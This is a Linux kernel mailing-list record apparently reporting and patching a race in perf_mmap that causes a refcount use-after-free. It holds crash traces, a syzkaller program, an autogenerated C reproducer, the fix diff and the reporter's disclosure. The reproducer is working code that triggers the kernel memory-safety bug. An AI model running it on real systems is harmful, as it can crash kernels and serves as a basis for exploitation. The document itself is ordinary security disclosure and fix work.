do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
Syzkaller reported a refcount_t: addition on 0; use-after-free warning
in perf_mmap.
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Reported-by: kernel test robot <lkp@intel.com>
Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/
Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 38 +++++++++++++++++++-------------------
1 file changed, 19 insertions(+), 19 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..abefd1213582 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
base-commit: 7d0a66e4bb9081d75c82ec4957c50034cb0ea449
--
2.51.0
|
{
"author": "Haocheng Yu <yuhaocheng035@gmail.com>",
"date": "Mon, 2 Feb 2026 15:44:35 +0800",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning
The full report is as below:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
